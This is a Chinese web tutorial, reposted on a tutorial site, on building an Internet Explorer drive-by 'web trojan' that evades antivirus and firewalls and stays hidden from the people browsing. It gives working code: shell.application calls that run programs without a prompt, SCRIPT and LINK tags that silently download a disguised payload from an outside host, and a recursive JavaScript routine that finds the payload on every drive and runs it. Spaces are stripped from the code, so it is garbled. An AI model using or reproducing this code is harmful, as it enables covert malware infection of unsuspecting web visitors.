打造完美的IE网页木马_漏洞研究教程-查字典教程网
打造完美的IE网页木马
打造完美的IE网页木马
发布时间:2016-12-26 来源:查字典编辑
摘要:作者:碧雪来源:第八军团既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项...

作者:碧雪来源:第八军团

既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项特征:

一:可以躲过杀毒软件的追杀;

二:可以避开网络防火墙的报警;

三:能够适用于多数的WINDOWS操作系统(主要包括WIN98、WINME、WIN2000、WINXP、WIN2003)中的多数IE版本(主要包括IE5.0、IE5.5、IE6.0),最好能打倒SP补丁;

四:让浏览者不容易发觉IE变化,即可以悄无声息,从而可以长久不被发现。

(注意以上四点只是指网页本身而言,但不包括你的木马程序,也就是说我们的网页木马只是负责运行指定的木马程序,至于你的木马程序的好坏只有你自己去选择啦!别找我要,我不会写的哦!)

满足以上四点我想才可以让你的马儿更青春更长久,跑的更欢更快……

看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足吧!

第一种:利用古老的MIME漏洞的IE网页木马

这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影响又太大,补丁差不多都补上啦,因此这种木马的种植成功率比较低。

第二种:利用com.ms.activeX.ActiveXComponent漏洞,结合WSH及FSO控件的IE网页木马

虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数IE版本中,是一个比较好的漏洞,利用价值非常高,但却因为它结合了流行的病毒调用的WSH及FSO控件,使其虽说可以避开网络防火墙的报警,可逃不脱杀毒软件的追捕(如诺顿)。

第三种:利用OBJECT对象类型确认漏洞(ObjectDataRemote)并结合WSH及FSO控件的IE网页木马(典型的代表有动鲨网页木马生成器)

此种木马最大的优点是适应的IE版本多,且漏洞较新,但却有如下不足:

1、因为此漏洞要调用Mshta.exe来访问网络下载木马程序,所以会引起防火墙报警(如天网防火墙);

2、如果此IE网页木马又利用了WSH及FSO控件,同样逃不脱杀毒软件的追捕(如诺顿),而

动鲨网页木马又恰恰使用了WSH及FSO控件,叹口气……可惜呀……?

3、再有就是这个漏洞需要网页服务器支持动态网页如ASP、JSP、CGI等,这就影响了它的发挥,毕竟现在的免费稳定的动态网页空间是少之又少;虽说此漏洞也可利用邮件MIME的形式(见我在安全焦点上发表的文章:《由错误MIME漏洞的利用想到的......---IEObjectData数据远程执行漏洞的利用》http://www.xfocus.net/articles/200309/607.html)来利用,但经测试发现对IE6.0不起作用。

看到上面的分析你是不是有了这种感觉:千军易得,一将难求,马儿成群,奈何千里马难寻!别急,下面让我带这大家一起打造我心中的完美IE网页木马。

首先要躲过杀毒软件的追杀,我们就不能利用WSH和FSO控件,因为只要利用了WSH和FSO控件就一定逃不脱“诺顿”的追杀,这可叫我们该如何是好?!别急,经过我的努力工作(说真的我也是在研究ASP木马时偶然发现的灵感)终于我有找到了一个可以用的控件,那就是shell.application,并且它可是经过了安全认证的,可以在“我的电脑”域中的网页中畅通无阻的执行,比WSH和FSO更容易得到执行权限(利用跨域漏洞即可),请看下面javascript代码:

<SCRIPTLANGUAGE="javascript"type="text/javascript">

varshell=newActiveXObject("shell.application");

shell.namespace("c:Windows").items().item("Notepad.exe").invokeverb();

</SCRIPT>

保存为test.htm后打开看是否自动打开了记事本程序,而且不会象WSH和FSO那样出现是否允许运行的提示框,是不是有点兴趣啦?现在我们已可以运行所有已知路径的程序,但我们要求运行我们自己的木马程序,所以还要求把我们的木马程序下载到浏览者的电脑上并找出它的位置。我们一个个来解决:

1、下载木马程序到浏览者的电脑中

这一点可以有很多解决方法,比如我以前提到的WINDOWS帮助文件访问协议下载任意文件漏洞(its:),不过这次我们不用它,再教大家两个更好的下载方法:

例一:利用SCRIPT标签,代码如下:

<SCRIPTLANGUAGE="icyfoxlovelace"src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>

注意此处的LANGUAGE属性可以为除javascript、VBScript、JScript以外的字符串,也可以是汉字,至于src的属性当然是你的木马程序的地址啦!因为现在免费空间出于安全考虑,多数不允许上传exe文件,我们可以变通一下把扩展名exe改为bat或pif、scr、com,同样可以运行。

例二:利用LINK标签,代码如下:

<LINKhref="http://www.godog.y365.com/wodemuma/icyfox.bat"rel=stylesheettype=text/css>

把代码放在标签<HEAD></HEAD>中间,href属性值为木马程序的地址。

上面两个是我所知的最好的两种下载木马程序的方法,它们下载后的程序都保存在在IE临时目录TemporaryInternetFiles目录下的子目录中。

2、找出已下载到浏览者的脑中的木马程序路径

我们可以利用shell.application控件的一些属性和方法,并结合js的错误处理try{}catch(e){}finally{}语句,进行递归调用来找到木马程序的路径,代码如下:functionicyfoxlovelace(){

//得到WINDOWS系统目录和系统盘

url=document.location.href;

xtmu=url.substring(6,url.indexOf('',9)+1);

xtp=url.substr(6,3);

varshell=newActiveXObject("shell.application");

varrunbz=1;

//此处设置木马程序的大小,以字节为单位

//请把198201改为你的木马程序的实际大小

varexeSize=198201;

//设置木马程序名及扩展名(exe,com,bat,pif,scr),用于判断是否是所下载的木马程序

//请把下面两行中的icyfox改为你的木马程序名,bat改为你的木马程序的扩展名

vara=/icyfox[d*].bat/gi;

a.compile("icyfox[d*].bat","gi");

varb=/[A-Za-z]:/gi;

b.compile("[A-Za-z]:","gi");//正则表达式,用于判断是否是盘的根目录

//下面的代码查找并运行木马程序

wjj(xtmu+"TemporaryInternetFiles");//Content.IE5if(runbz)wjj(xtp+"DocumentsandSettings");

if(runbz)yp();

//在所有硬盘分区下查找并运行木马程序

functionyp(){

try{

varc=newEnumerator(shell.namespace("c:").ParentFolder.Items());

for(;!c.atEnd();c.moveNext()){

if(runbz){if(b.test(c.item().path))wjj(c.item().path);}

elsebreak;

}

}catch(e){}

}

//利用递归在指定目录(包括子目录)下查找并运行木马程序

functionwjj(b){

try{

varc=newEnumerator(shell.namespace(b).Items());

for(;!c.atEnd();c.moveNext()){

if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){

varf=c.item().path;

varv=f.lastIndexOf('')+1;

try{

shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb();//运行木马程序

runbz=0;

break;

}catch(e){}

}

if(!c.item().Size)wjj(c.item().path+"");//如果是子目录则递归调用

}

}catch(e){}

}

}

icyfoxlovelace();

请把以上代码保存为icyfox.js。

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类